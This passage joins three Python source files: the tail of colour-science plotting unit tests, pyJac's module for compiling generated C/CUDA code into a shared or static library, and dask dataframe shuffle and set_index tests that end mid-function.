            "Gamma 2.4": lambda x: x ** (1 / 2.4),
            "Gamma 2.6": lambda x: x ** (1 / 2.6),
        }
        # A single plot_kwargs dict applies to every function.
        plot_kwargs = {"c": "r"}
        figure, axes = plot_multi_functions(functions, plot_kwargs=plot_kwargs)
        self.assertIsInstance(figure, Figure)
        self.assertIsInstance(axes, Axes)
        # A list of plot_kwargs applies element-wise; log axes are supported
        # on either or both axes.
        plot_kwargs = [{"c": "r"}, {"c": "g"}, {"c": "b"}]
        figure, axes = plot_multi_functions(
            functions, log_x=10, log_y=10, plot_kwargs=plot_kwargs
        )
        self.assertIsInstance(figure, Figure)
        self.assertIsInstance(axes, Axes)
        figure, axes = plot_multi_functions(functions, log_x=10)
        self.assertIsInstance(figure, Figure)
        self.assertIsInstance(axes, Axes)
        figure, axes = plot_multi_functions(functions, log_y=10)
        self.assertIsInstance(figure, Figure)
        self.assertIsInstance(axes, Axes)
class TestPlotImage(unittest.TestCase):
    """
    Define :func:`colour.plotting.common.plot_image` definition unit tests
    methods.
    """
    def test_plot_image(self):
        """Test :func:`colour.plotting.common.plot_image` definition."""
        # Use the documentation logo that ships with a source checkout.
        path = os.path.join(
            colour.__path__[0], "..", "docs", "_static", "Logo_Medium_001.png"
        )
        # Distribution does not ship the documentation thus we are skipping
        # this unit test if the image does not exist.
        if not os.path.exists(path):  # pragma: no cover
            return
        figure, axes = plot_image(read_image(path))
        self.assertIsInstance(figure, Figure)
        self.assertIsInstance(axes, Axes)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
|
"""Module used to create a shared/static library from pyJac files.
"""
from __future__ import print_function
import shutil
import re
import os
import subprocess
import sys
import multiprocessing
import platform
from .. import utils
def lib_ext(shared):
    """Return the library filename extension: ``.so`` if shared, ``.a`` if static."""
    return '.so' if shared else '.a'
# Compiler executable used for each supported language/toolchain.
cmd_compile = dict(c='gcc',
                   icc='icc',
                   cuda='nvcc'
                   )
def cmd_lib(lang, shared):
    """Return the archiver/linker invocation prefix for library creation.

    Parameters
    ----------
    lang : {'c', 'icc', 'cuda'}
        Programming language / toolchain.
    shared : bool
        If ``True``, build a shared library; otherwise a static archive.

    Returns
    -------
    list of str
        The command prefix (argv list) to create the library.

    Raises
    ------
    ValueError
        If `lang` is not a supported language. (Previously an unknown
        language silently returned ``None``, deferring the failure to the
        caller.)
    """
    if lang == 'c':
        return ['ar', 'rcs'] if not shared else ['gcc', '-shared']
    elif lang == 'cuda':
        return ['nvcc', '-lib'] if not shared else ['nvcc', '-shared']
    elif lang == 'icc':
        return ['ar', 'rcs'] if not shared else ['icc', '-shared']
    raise ValueError('Unsupported language: {}'.format(lang))
# Default system include directories searched per language.
includes = dict(c=['/usr/local/include/'], icc=['/usr/local/include/'],
                cuda=['/usr/local/cuda/include/',
                      '/usr/local/cuda/samples/common/inc/'
                      ]
                )
# Baseline compilation flags per language.
flags = dict(c=['-std=c99', '-O3', '-mtune=native'],
             icc=['-std=c99', '-O3', '-xhost', '-fp-model', 'precise', '-ipo'],
             cuda=['-O3', '-arch=sm_20']
             )
# Extra flags required when the objects may end up in a shared library.
shared_flags = dict(c=['-fPIC'],
                    icc=['-fPIC'],
                    cuda=['-Xcompiler', '"-fPIC"']
                    )
# Link-time libraries / flags per language.
libs = dict(c=['-lm', '-std=c99'],
            cuda=['-lcudart'],
            icc=['-m64', '-ipo', '-lm', '-std=c99']
            )
def which(file):
    """A substitute for the `which` command: search each PATH entry for
    the given file and return its full path, or None if absent."""
    for directory in os.environ["PATH"].split(os.pathsep):
        candidate = os.path.join(directory, file)
        if os.path.exists(candidate):
            return candidate
    return None
def compiler(fstruct):
    """Given a file structure, this method will compile the source file for the
    language and options specified

    Parameters
    ----------
    fstruct : `file_struct`
        An information struct that holds the various compilation options

    Returns
    -------
    success : int
        0 if the compilation process was sucessful, -1 otherwise

    Notes
    -----
    Designed to work with a multiprocess compilation workflow
    """
    args = [cmd_compile[fstruct.build_lang]]
    if fstruct.auto_diff:
        # Autodifferentiation builds always compile with g++.
        args = ['g++']
    args.extend(flags[fstruct.build_lang])
    if fstruct.auto_diff:
        # g++ rejects -std=c99; strip it from the inherited C flags.
        args = [x for x in args if 'std=c99' not in x]
    #always use fPIC in case we're building wrapper
    args.extend(shared_flags[fstruct.build_lang])
    args.extend(fstruct.args)
    include = ['-I{}'.format(d) for d in fstruct.i_dirs +
               includes[fstruct.build_lang]
               ]
    args.extend(include)
    args.extend([
        # nvcc needs -dc (relocatable device code); host compilers use -c.
        '-{}c'.format('d' if fstruct.lang == 'cuda' else ''),
        os.path.join(fstruct.source_dir, fstruct.filename +
                     utils.file_ext[fstruct.build_lang]
                     ),
        '-o', os.path.join(fstruct.obj_dir, os.path.basename(fstruct.filename) + '.o')
    ])
    # Drop empty/whitespace-only arguments before invoking the compiler.
    args = [val for val in args if val.strip()]
    try:
        print(' '.join(args))
        subprocess.check_call(args)
    except OSError:
        # Raised when the compiler executable itself cannot be found.
        print('Error: Compiler {} not found, generation of pyjac library failed.'.format(args[0]))
        sys.exit(-1)
    except subprocess.CalledProcessError:
        # Non-zero compiler exit: report and let the pool collect the failure.
        print('Error: compilation failed for ' + fstruct.filename +
              utils.file_ext[fstruct.build_lang]
              )
        return -1
    return 0
def get_cuda_path():
    """Returns location of CUDA (nvcc) on the system.

    Returns
    -------
    cuda_path : str
        Path of the CUDA library directory derived from the nvcc location.
    """
    nvcc = which('nvcc')
    if nvcc is None:
        print('nvcc not found!')
        sys.exit(-1)

    # <cuda root>/bin/nvcc -> <cuda root>, then pick lib or lib64.
    cuda_root = os.path.dirname(os.path.dirname(nvcc))
    lib_dir = 'lib{}'.format(
        '64' if platform.architecture()[0] == '64bit' else ''
    )
    return os.path.join(cuda_root, lib_dir)
def libgen(lang, obj_dir, out_dir, filelist, shared, auto_diff):
    """Create a library from a list of compiled object files.

    Parameters
    ----------
    lang : {'c', 'cuda'}
        Programming language
    obj_dir : str
        Path with object files
    out_dir : str
        Path to place the library in
    filelist : list of str
        The list of object files to include in the library
    shared : bool
        If ``True``, create a shared library (vs. a static archive)
    auto_diff : bool
        If ``True``, this is an autodifferentiation build (affects naming)

    Returns
    -------
    libname : str
        File name of the generated library (inside `out_dir`).
    """
    command = cmd_lib(lang, shared)

    if lang == 'cuda':
        desc = 'cu'
    elif lang == 'c':
        desc = 'ad' if auto_diff else 'c'
    else:
        # Guard: previously an unknown language left `desc` unbound and
        # raised a NameError further down.
        print('Cannot generate library for unknown language {}'.format(lang))
        sys.exit(-1)

    libname = 'lib{}_pyjac'.format(desc)

    # Remove any stale library, both the shared and the static variant.
    for ext in (lib_ext(shared), lib_ext(not shared)):
        old_lib = os.path.join(out_dir, libname + ext)
        if os.path.exists(old_lib):
            os.remove(old_lib)

    libname += lib_ext(shared)

    # `ar rcs` expects the output archive immediately after the flags.
    if not shared and lang == 'c':
        command += [os.path.join(out_dir, libname)]

    # Add the object files.
    command.extend([os.path.join(obj_dir, os.path.basename(f) + '.o') for f in filelist])

    if shared:
        command.extend(shared_flags[lang])
    if shared or lang == 'cuda':
        command += ['-o']
        command += [os.path.join(out_dir, libname)]

    if lang == 'cuda':
        command += ['-L{}'.format(get_cuda_path())]
    command.extend(libs[lang])

    try:
        print(' '.join(command))
        subprocess.check_call(command)
    except OSError:
        # BUG FIX: this handler previously referenced the undefined name
        # `args`, raising a NameError instead of printing the message.
        print('Error: Compiler {} not found, generation of pyjac library failed.'.format(command[0]))
        sys.exit(-1)
    except subprocess.CalledProcessError:
        print('Error: Generation of pyjac library failed.')
        sys.exit(-1)

    return libname
class file_struct(object):
    """A simple structure designed to enable multiprocess compilation
    """

    def __init__(self, lang, build_lang, filename, i_dirs, args,
                 source_dir, obj_dir, shared
                 ):
        """
        Parameters
        ----------
        lang : str
            Compiler to use
        build_lang : {'c', 'cuda'}
            Programming language
        filename : str
            The file to compile
        i_dirs : list of str
            List of include directories for compilation
        args : list of str
            List of additional arguments
        source_dir : str
            The directory the file is located in
        obj_dir : str
            The directory to place the compiled object file in
        shared : bool
            If true, this is creating a shared library
        """
        self.lang = lang
        self.build_lang = build_lang
        self.filename = filename
        self.i_dirs = i_dirs
        self.args = args
        self.source_dir = source_dir
        self.obj_dir = obj_dir
        self.shared = shared
        # Toggled externally for autodifferentiation builds.
        self.auto_diff = False
def get_file_list(source_dir, pmod, lang, FD=False, AD=False):
    """Return the include directories and source-file basenames to compile.

    Parameters
    ----------
    source_dir : str
        Path with source files
    pmod : bool
        ``True`` if pressure dependent reactions present in mechanism
    lang : {'c', 'cuda'}
        Programming language
    FD : Optional[bool]
        Optional; if ``True``, include finite difference
    AD : Optional[bool]
        Optional; if ``True``, include autodifferentiation

    Returns
    -------
    i_dirs : list of `str`
        List of include directories
    files : list of `str`
        List of files
    """
    i_dirs = [source_dir]

    if AD:
        # Autodifferentiation builds use a fixed, self-contained file set.
        files = ['ad_dydt', 'ad_rxn_rates', 'ad_spec_rates',
                 'ad_chem_utils', 'ad_jac'
                 ]
        if pmod:
            files += ['ad_rxn_rates_pres_mod']
        return i_dirs, files

    files = ['chem_utils', 'dydt', 'spec_rates',
             'rxn_rates', 'mechanism', 'mass_mole'
             ]
    if pmod:
        files += ['rxn_rates_pres_mod']

    if FD:
        files += ['fd_jacob']
        flists = []
    else:
        files += ['jacob']
        flists = [('jacobs', 'jac_list_{}')]

    flists += [('rates', 'rate_list_{}')]
    for flist in flists:
        try:
            with open(os.path.join(source_dir,
                      flist[0], flist[1].format(lang))
                      ) as file:
                vals = file.readline().strip().split(' ')
                vals = [os.path.join(flist[0],
                        f[:f.index(utils.file_ext[lang])]) for f in vals
                        ]
                files += vals
                i_dirs.append(os.path.join(source_dir, flist[0]))
        except Exception:
            # The split-source file lists are optional: a missing or
            # malformed list simply means there are no extra files.
            # (BUG FIX: was a bare ``except:``, which also swallowed
            # SystemExit and KeyboardInterrupt.)
            pass

    if lang == 'cuda':
        files += ['gpu_memory']

    return i_dirs, files
def generate_library(lang, source_dir, obj_dir=None,
                     out_dir=None, shared=None,
                     finite_difference=False, auto_diff=False
                     ):
    """Generate shared/static library for pyJac files.

    Parameters
    ----------
    lang : {'c', 'cuda'}
        Programming language
    source_dir : str
        Path of folder with pyJac files
    obj_dir : Optional[str]
        Optional; path of folder to store generated object files
    shared : bool
        If ``True``, generate shared library (vs. static)
    finite_difference : Optional[bool]
        If ``True``, include finite differences
    auto_diff : bool
        If ``True``, include autodifferentiation

    Returns
    -------
    Location of generated library
    """
    #check lang
    if lang not in flags.keys():
        print('Cannot generate library for unknown language {}'.format(lang))
        sys.exit(-1)
    # CUDA cannot link shared device libraries, so force a static build.
    shared = shared and lang != 'cuda'
    # NOTE(review): `shared` was just forced to False for CUDA above, so this
    # error branch is unreachable -- a CUDA shared request is silently
    # downgraded to static instead of failing. Confirm intended behaviour.
    if lang == 'cuda' and shared:
        print('CUDA does not support linking of shared device libraries.')
        sys.exit(-1)
    # icc compiles plain C sources.
    build_lang = lang if lang != 'icc' else 'c'
    source_dir = os.path.abspath(os.path.normpath(source_dir))
    if obj_dir is None:
        obj_dir = os.path.join(os.getcwd(), 'obj')
    else:
        obj_dir = os.path.abspath(os.path.normpath(obj_dir))
    if not os.path.exists(obj_dir):
        os.makedirs(obj_dir)
    if out_dir is None:
        out_dir = os.getcwd()
    else:
        out_dir = os.path.abspath(os.path.normpath(out_dir))
    if not os.path.exists(out_dir):
        os.makedirs(out_dir)
    obj_dir = os.path.abspath(obj_dir)
    out_dir = os.path.abspath(out_dir)
    pmod = False
    #figure out whether there's pressure mod reactions or not
    with open(os.path.join(source_dir,
              'mechanism{}'.format(utils.header_ext[build_lang])), 'r'
              ) as file:
        for line in file.readlines():
            line = line.strip()
            # The generated mechanism header defines PRES_MOD_RATES.
            match = re.search(r'\s*#define PRES_MOD_RATES (\d+)', line)
            if match is not None:
                pmod = int(match.group(1)) > 0
                break
    #get file lists
    i_dirs, files = get_file_list(source_dir, pmod, build_lang,
                                  FD=finite_difference, AD=auto_diff
                                  )
    # Compile generated source code
    structs = [file_struct(lang, build_lang, f, i_dirs,
                           (['-DFINITE_DIFF'] if finite_difference else []),
                           source_dir, obj_dir, shared) for f in files
               ]
    for x in structs:
        x.auto_diff=auto_diff
    # Compile the files in parallel, one worker per CPU.
    pool = multiprocessing.Pool()
    results = pool.map(compiler, structs)
    pool.close()
    pool.join()
    if any(r == -1 for r in results):
        sys.exit(-1)
    libname = libgen(lang, obj_dir, out_dir, files, shared, auto_diff)
    return os.path.join(out_dir, libname)
|
|
import itertools
import os
import random
import tempfile
from unittest import mock
import pandas as pd
import pytest
import pickle
import numpy as np
import string
import multiprocessing as mp
from copy import copy
import dask
import dask.dataframe as dd
from dask.dataframe._compat import tm, assert_categorical_equal
from dask import delayed
from dask.base import compute_as_if_collection
from dask.dataframe.shuffle import (
shuffle,
partitioning_index,
rearrange_by_column,
rearrange_by_divisions,
maybe_buffered_partd,
remove_nans,
)
from dask.dataframe.utils import assert_eq, make_meta
# Three hand-built pandas partitions keyed like a dask graph; the division
# boundaries below are [0, 4, 9, 9].
dsk = {
    ("x", 0): pd.DataFrame({"a": [1, 2, 3], "b": [1, 4, 7]}, index=[0, 1, 3]),
    ("x", 1): pd.DataFrame({"a": [4, 5, 6], "b": [2, 5, 8]}, index=[5, 6, 8]),
    ("x", 2): pd.DataFrame({"a": [7, 8, 9], "b": [3, 6, 9]}, index=[9, 9, 9]),
}
meta = make_meta({"a": "i8", "b": "i8"}, index=pd.Index([], "i8"))
d = dd.DataFrame(dsk, "x", meta, [0, 4, 9, 9])
# Fully-materialised pandas equivalent of `d`.
full = d.compute()
shuffle_func = shuffle  # conflicts with keyword argument
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_shuffle(shuffle):
    shuffled = shuffle_func(d, d.b, shuffle=shuffle)
    assert isinstance(shuffled, dd.DataFrame)
    assert shuffled.npartitions == d.npartitions

    part_0 = dask.get(shuffled.dask, (shuffled._name, 0))
    part_1 = dask.get(shuffled.dask, (shuffled._name, 1))

    # Rows sharing a key never land in two partitions.
    assert not (set(part_0.b) & set(part_1.b))  # disjoint

    assert set(shuffled.dask).issuperset(d.dask)

    # Deterministic tokenisation: same inputs, same graph name.
    assert shuffle_func(d, d.b)._name == shuffle_func(d, d.b)._name
def test_default_partitions():
    # Without an explicit npartitions, the input partitioning is kept.
    result = shuffle(d, d.b)
    assert result.npartitions == d.npartitions
def test_shuffle_npartitions_task():
    # An output npartitions that is not a multiple of max_branch exercises
    # the multi-stage task shuffle.
    df = pd.DataFrame({"x": np.random.random(100)})
    ddf = dd.from_pandas(df, npartitions=10)
    s = shuffle(ddf, ddf.x, shuffle="tasks", npartitions=17, max_branch=4)
    sc = s.compute(scheduler="sync")
    assert s.npartitions == 17
    assert set(s.dask).issuperset(set(ddf.dask))
    assert len(sc) == len(df)
    assert list(s.columns) == list(df.columns)
    # Same rows must survive, in any order/partitioning.
    assert set(map(tuple, sc.values.tolist())) == set(map(tuple, df.values.tolist()))
@pytest.mark.parametrize("method", ["disk", "tasks"])
def test_index_with_non_series(method):
    from dask.dataframe.tests.test_multi import list_eq

    # Shuffling on a column name must match shuffling on the Series itself.
    by_series = shuffle(d, d.b, shuffle=method)
    by_name = shuffle(d, "b", shuffle=method)
    list_eq(by_series, by_name)
@pytest.mark.parametrize("method", ["disk", "tasks"])
def test_index_with_dataframe(method):
    # A one-column frame, a column list and a bare column name must all
    # produce the same rows.
    results = [
        shuffle(d, d[["b"]], shuffle=method).compute(),
        shuffle(d, ["b"], shuffle=method).compute(),
        shuffle(d, "b", shuffle=method).compute(),
    ]
    baseline = sorted(results[0].values.tolist())
    assert baseline == sorted(results[1].values.tolist())
    assert baseline == sorted(results[2].values.tolist())
@pytest.mark.parametrize("method", ["disk", "tasks"])
def test_shuffle_from_one_partition_to_one_other(method):
    df = pd.DataFrame({"x": [1, 2, 3]})
    source = dd.from_pandas(df, 1)

    # Shuffling one partition into 1 or 2 partitions must not drop rows.
    for npartitions in [1, 2]:
        shuffled = shuffle(source, "x", npartitions=npartitions, shuffle=method)
        assert len(source.compute(scheduler="sync")) == len(
            shuffled.compute(scheduler="sync")
        )
@pytest.mark.parametrize("method", ["disk", "tasks"])
def test_shuffle_empty_partitions(method):
    # 30 rows with only 3 distinct keys shuffled into 6 partitions guarantees
    # some empty output partitions; those must still carry correct columns.
    df = pd.DataFrame({"x": [1, 2, 3] * 10})
    ddf = dd.from_pandas(df, npartitions=3)
    s = shuffle(ddf, ddf.x, npartitions=6, shuffle=method)
    parts = compute_as_if_collection(dd.DataFrame, s.dask, s.__dask_keys__())
    for p in parts:
        assert s.columns == p.columns
# Wide fixture covering the dtypes partitioning_index must hash correctly
# (ints, floats with NaN, categorical, object, bool, datetimes with and
# without timezone, timedeltas).
df2 = pd.DataFrame(
    {
        "i32": np.array([1, 2, 3] * 3, dtype="int32"),
        "f32": np.array([None, 2.5, 3.5] * 3, dtype="float32"),
        "cat": pd.Series(["a", "b", "c"] * 3).astype("category"),
        "obj": pd.Series(["d", "e", "f"] * 3),
        "bool": np.array([True, False, True] * 3),
        "dt": pd.Series(pd.date_range("20130101", periods=9)),
        "dt_tz": pd.Series(pd.date_range("20130101", periods=9, tz="US/Eastern")),
        "td": pd.Series(pd.timedelta_range("2000", periods=9)),
    }
)
def test_partitioning_index():
    # Hash-partitioning must yield values in [0, npartitions), actually
    # spread the rows, and be deterministic across calls.
    res = partitioning_index(df2.i32, 3)
    assert ((res < 3) & (res >= 0)).all()
    assert len(np.unique(res)) > 1
    assert (partitioning_index(df2.i32, 3) == partitioning_index(df2.i32, 3)).all()
    # A single-column frame behaves like the bare series.
    res = partitioning_index(df2[["i32"]], 3)
    assert ((res < 3) & (res >= 0)).all()
    assert len(np.unique(res)) > 1
    # Mixed dtypes (categorical / bool / float) hash together.
    res = partitioning_index(df2[["cat", "bool", "f32"]], 2)
    assert ((0 <= res) & (res < 2)).all()
    # The index itself can also be partitioned on.
    res = partitioning_index(df2.index, 4)
    assert ((res < 4) & (res >= 0)).all()
    assert len(np.unique(res)) > 1
def test_partitioning_index_categorical_on_values():
    # Categoricals must hash on their values, not their category codes:
    # reversing the category order must not change the partition mapping.
    df = pd.DataFrame({"a": list(string.ascii_letters), "b": [1, 2, 3, 4] * 13})
    df.a = df.a.astype("category")
    df2 = df.copy()
    df2.a = df2.a.cat.set_categories(list(reversed(df2.a.cat.categories)))
    res = partitioning_index(df.a, 5)
    res2 = partitioning_index(df2.a, 5)
    assert (res == res2).all()
    # Same invariant when hashing the whole frame.
    res = partitioning_index(df, 5)
    res2 = partitioning_index(df2, 5)
    assert (res == res2).all()
@pytest.mark.parametrize(
    "npartitions", [1, 4, 7, pytest.param(23, marks=pytest.mark.slow)]
)
def test_set_index_tasks(npartitions):
    df = pd.DataFrame(
        {"x": np.random.random(100), "y": np.random.random(100) // 0.2},
        index=np.random.random(100),
    )
    ddf = dd.from_pandas(df, npartitions=npartitions)
    # Task-based set_index must match pandas for column names, Series,
    # derived expressions and the existing index.
    assert_eq(df.set_index("x"), ddf.set_index("x", shuffle="tasks"))
    assert_eq(df.set_index("y"), ddf.set_index("y", shuffle="tasks"))
    assert_eq(df.set_index(df.x), ddf.set_index(ddf.x, shuffle="tasks"))
    assert_eq(df.set_index(df.x + df.y), ddf.set_index(ddf.x + ddf.y, shuffle="tasks"))
    assert_eq(df.set_index(df.x + 1), ddf.set_index(ddf.x + 1, shuffle="tasks"))
    assert_eq(df.set_index(df.index), ddf.set_index(ddf.index, shuffle="tasks"))
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_set_index_self_index(shuffle):
    df = pd.DataFrame(
        {"x": np.random.random(100), "y": np.random.random(100) // 0.2},
        index=np.random.random(100),
    )
    ddf = dd.from_pandas(df, npartitions=4)

    # Setting the index to itself is a no-op returning the same object.
    result = ddf.set_index(ddf.index, shuffle=shuffle)
    assert result is ddf
    assert_eq(result, df.set_index(df.index))
@pytest.mark.parametrize("shuffle", ["tasks"])
def test_set_index_names(shuffle):
    df = pd.DataFrame(
        {"x": np.random.random(100), "y": np.random.random(100) // 0.2},
        index=np.random.random(100),
    )
    ddf = dd.from_pandas(df, npartitions=4)
    # Identical arguments produce identical graph keys...
    assert set(ddf.set_index("x", shuffle=shuffle).dask) == set(
        ddf.set_index("x", shuffle=shuffle).dask
    )
    # ...while any differing argument (column, max_branch, drop) must change
    # the token and therefore the key set.
    assert set(ddf.set_index("x", shuffle=shuffle).dask) != set(
        ddf.set_index("y", shuffle=shuffle).dask
    )
    assert set(ddf.set_index("x", max_branch=4, shuffle=shuffle).dask) != set(
        ddf.set_index("x", max_branch=3, shuffle=shuffle).dask
    )
    assert set(ddf.set_index("x", drop=True, shuffle=shuffle).dask) != set(
        ddf.set_index("x", drop=False, shuffle=shuffle).dask
    )
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_set_index_tasks_2(shuffle):
    ddf = dd.demo.make_timeseries(
        "2000",
        "2004",
        {"value": float, "name": str, "id": int},
        freq="2H",
        partition_freq="1M",
        seed=1,
    )

    # Smoke test: set_index on a string column followed by a reduction.
    indexed = ddf.set_index("name", shuffle=shuffle)
    indexed.value.sum().compute(scheduler="sync")
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_set_index_tasks_3(shuffle):
    pdf = pd.DataFrame(np.random.random((10, 2)), columns=["x", "y"])
    ddf = dd.from_pandas(pdf, npartitions=5)

    indexed = ddf.set_index(
        "x", shuffle=shuffle, max_branch=2, npartitions=ddf.npartitions
    )
    assert_eq(pdf.set_index("x"), indexed)
    # Explicitly requesting the input partition count must be honoured.
    assert indexed.npartitions == ddf.npartitions
@pytest.mark.parametrize("shuffle", ["tasks", "disk"])
def test_shuffle_sort(shuffle):
    pdf = pd.DataFrame({"x": [1, 2, 3, 2, 1], "y": [9, 8, 7, 1, 5]})
    ddf = dd.from_pandas(pdf, npartitions=3)

    expected = pdf.set_index("x").sort_index()
    result = ddf.set_index("x", shuffle=shuffle)

    # Label-based slicing relies on the shuffled output being sorted.
    assert_eq(result.loc[2:3], expected.loc[2:3])
@pytest.mark.parametrize("shuffle", ["tasks", "disk"])
@pytest.mark.parametrize("scheduler", ["threads", "processes"])
def test_rearrange(shuffle, scheduler):
    df = pd.DataFrame({"x": np.random.random(10)})
    ddf = dd.from_pandas(df, npartitions=4)
    # `_partitions` assigns each row an explicit destination partition.
    ddf2 = ddf.assign(_partitions=ddf.x % 4)
    result = rearrange_by_column(ddf2, "_partitions", max_branch=32, shuffle=shuffle)
    assert result.npartitions == ddf.npartitions
    assert set(ddf.dask).issubset(result.dask)
    # Every value in exactly one partition
    a = result.compute(scheduler=scheduler)
    get = dask.base.get_scheduler(scheduler=scheduler)
    parts = get(result.dask, result.__dask_keys__())
    for i in a._partitions.drop_duplicates():
        assert sum(i in set(part._partitions) for part in parts) == 1
def test_rearrange_cleanup():
    """Disk shuffle must remove its partd scratch files when finished.

    Bug fix: the config key was misspelled ``temporay_directory``, so the
    intended temporary directory was never actually configured and the final
    assertion inspected a directory dask never wrote to.  ``dask.config.set``
    keyword arguments map underscores to hyphens, so ``temporary_directory``
    sets the documented ``temporary-directory`` key.
    """
    df = pd.DataFrame({"x": np.random.random(10)})
    ddf = dd.from_pandas(df, npartitions=4)
    # Route rows to four buckets via the reserved _partitions column.
    ddf2 = ddf.assign(_partitions=ddf.x % 4)
    tmpdir = tempfile.mkdtemp()
    with dask.config.set(temporary_directory=str(tmpdir)):
        result = rearrange_by_column(ddf2, "_partitions", max_branch=32, shuffle="disk")
        result.compute(scheduler="processes")
    # All partd scratch files must have been cleaned up.
    assert len(os.listdir(tmpdir)) == 0
def mock_shuffle_group_3(df, col, npartitions, p):
    """Stand-in for ``shuffle_group_3`` that always fails.

    Patched in to verify that disk-shuffle temp files are cleaned up when an
    internal error occurs mid-shuffle.
    """
    raise ValueError("Mock exception!")
def test_rearrange_disk_cleanup_with_exception():
    """Temporary partd files are cleaned up even when the shuffle raises.

    Bug fix: ``temporay_directory`` was a typo for ``temporary_directory``,
    so the config was silently ignored and the assertion checked an unused
    directory (``dask.config.set`` kwargs map underscores to the hyphenated
    ``temporary-directory`` key).
    """
    # ensure temporary files are cleaned up when there's an internal exception.
    with mock.patch("dask.dataframe.shuffle.shuffle_group_3", new=mock_shuffle_group_3):
        df = pd.DataFrame({"x": np.random.random(10)})
        ddf = dd.from_pandas(df, npartitions=4)
        ddf2 = ddf.assign(_partitions=ddf.x % 4)
        tmpdir = tempfile.mkdtemp()
        with dask.config.set(temporary_directory=str(tmpdir)):
            with pytest.raises(ValueError, match="Mock exception!"):
                result = rearrange_by_column(
                    ddf2, "_partitions", max_branch=32, shuffle="disk"
                )
                result.compute(scheduler="processes")
    # Scratch files must be gone despite the mid-shuffle failure.
    assert len(os.listdir(tmpdir)) == 0
def test_rearrange_by_column_with_narrow_divisions():
    """rearrange_by_divisions with narrow divisions must not lose rows."""
    from dask.dataframe.tests.test_multi import list_eq
    A = pd.DataFrame({"x": [1, 2, 3, 4, 5, 6], "y": [1, 1, 2, 2, 3, 4]})
    a = dd.repartition(A, [0, 4, 5])
    df = rearrange_by_divisions(a, "x", (0, 2, 5))
    # Same rows, partitioning/order ignored.
    list_eq(df, a)
def test_maybe_buffered_partd():
    """maybe_buffered_partd builds a buffered partd, but unpickles unbuffered.

    The ``buffer`` flag is dropped on serialization — presumably so that
    copies sent to worker processes write straight to file-backed partd
    (NOTE(review): intent inferred from behavior; confirm).
    """
    import partd
    f = maybe_buffered_partd()
    p1 = f()
    assert isinstance(p1.partd, partd.Buffer)
    # Round-trip through pickle, as happens when shipped to workers.
    f2 = pickle.loads(pickle.dumps(f))
    assert not f2.buffer
    p2 = f2()
    assert isinstance(p2.partd, partd.File)
def test_set_index_with_explicit_divisions():
    """Explicit divisions are used verbatim and must trigger no computation."""
    df = pd.DataFrame({"x": [4, 1, 2, 5]}, index=[10, 20, 30, 40])
    ddf = dd.from_pandas(df, npartitions=2)
    def throw(*args, **kwargs):
        # Any scheduler invocation during graph construction would call this.
        raise Exception()
    with dask.config.set(get=throw):
        ddf2 = ddf.set_index("x", divisions=[1, 3, 5])
        assert ddf2.divisions == (1, 3, 5)
    df2 = df.set_index("x")
    assert_eq(ddf2, df2)
    # Divisions must be sorted
    with pytest.raises(ValueError):
        ddf.set_index("x", divisions=[3, 1, 5])
def test_set_index_divisions_2():
    """String-valued divisions are honored and produce a sorted index."""
    df = pd.DataFrame({"x": [1, 2, 3, 4, 5, 6], "y": list("abdabd")})
    ddf = dd.from_pandas(df, 2)
    result = ddf.set_index("y", divisions=["a", "c", "d"])
    assert result.divisions == ("a", "c", "d")
    # Last partition holds the "d" values.
    assert list(result.compute(scheduler="sync").index[-2:]) == ["d", "d"]
def test_set_index_divisions_compute():
    """compute=True eagerly materializes but must agree with the lazy result.

    NOTE(review): ``d`` and ``full`` are module-level fixtures defined
    elsewhere in this file.
    """
    d2 = d.set_index("b", divisions=[0, 2, 9], compute=False)
    d3 = d.set_index("b", divisions=[0, 2, 9], compute=True)
    assert_eq(d2, d3)
    assert_eq(d2, full.set_index("b"))
    assert_eq(d3, full.set_index("b"))
    # The eager variant should carry a smaller remaining graph.
    assert len(d2.dask) > len(d3.dask)
    d4 = d.set_index(d.b, divisions=[0, 2, 9], compute=False)
    d5 = d.set_index(d.b, divisions=[0, 2, 9], compute=True)
    exp = full.copy()
    exp.index = exp.b
    assert_eq(d4, d5)
    assert_eq(d4, exp)
    assert_eq(d5, exp)
    assert len(d4.dask) > len(d5.dask)
def test_set_index_divisions_sorted():
    """sorted=True with explicit divisions must not trigger any computation."""
    p1 = pd.DataFrame({"x": [10, 11, 12], "y": ["a", "a", "a"]})
    p2 = pd.DataFrame({"x": [13, 14, 15], "y": ["b", "b", "c"]})
    p3 = pd.DataFrame({"x": [16, 17, 18], "y": ["d", "e", "e"]})
    ddf = dd.DataFrame(
        {("x", 0): p1, ("x", 1): p2, ("x", 2): p3}, "x", p1, [None, None, None, None]
    )
    df = ddf.compute()
    def throw(*args, **kwargs):
        # Any scheduler call during set_index would hit this.
        raise Exception("Shouldn't have computed")
    with dask.config.set(get=throw):
        res = ddf.set_index("x", divisions=[10, 13, 16, 18], sorted=True)
    assert_eq(res, df.set_index("x"))
    with dask.config.set(get=throw):
        res = ddf.set_index("y", divisions=["a", "b", "d", "e"], sorted=True)
    assert_eq(res, df.set_index("y"))
    # with sorted=True, divisions must be same length as df.divisions
    with pytest.raises(ValueError):
        ddf.set_index("y", divisions=["a", "b", "c", "d", "e"], sorted=True)
    # Divisions must be sorted
    with pytest.raises(ValueError):
        ddf.set_index("y", divisions=["a", "b", "d", "c"], sorted=True)
@pytest.mark.slow
def test_set_index_consistent_divisions():
    """Division choice must be identical across concurrent processes."""
    # See https://github.com/dask/dask/issues/3867
    df = pd.DataFrame(
        {"x": np.random.random(100), "y": np.random.random(100) // 0.2},
        index=np.random.random(100),
    )
    ddf = dd.from_pandas(df, npartitions=4)
    ddf = ddf.clear_divisions()
    # Spawned workers each run set_index independently; all must agree.
    ctx = mp.get_context("spawn")
    pool = ctx.Pool(processes=8)
    with pool:
        results = [pool.apply_async(_set_index, (ddf, "x")) for _ in range(100)]
        divisions_set = set(result.get() for result in results)
    assert len(divisions_set) == 1
def _set_index(df, *args, **kwargs):
return df.set_index(*args, **kwargs).divisions
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_set_index_reduces_partitions_small(shuffle):
    """npartitions='auto' collapses many tiny partitions into a few."""
    df = pd.DataFrame({"x": np.random.random(100)})
    ddf = dd.from_pandas(df, npartitions=50)
    ddf2 = ddf.set_index("x", shuffle=shuffle, npartitions="auto")
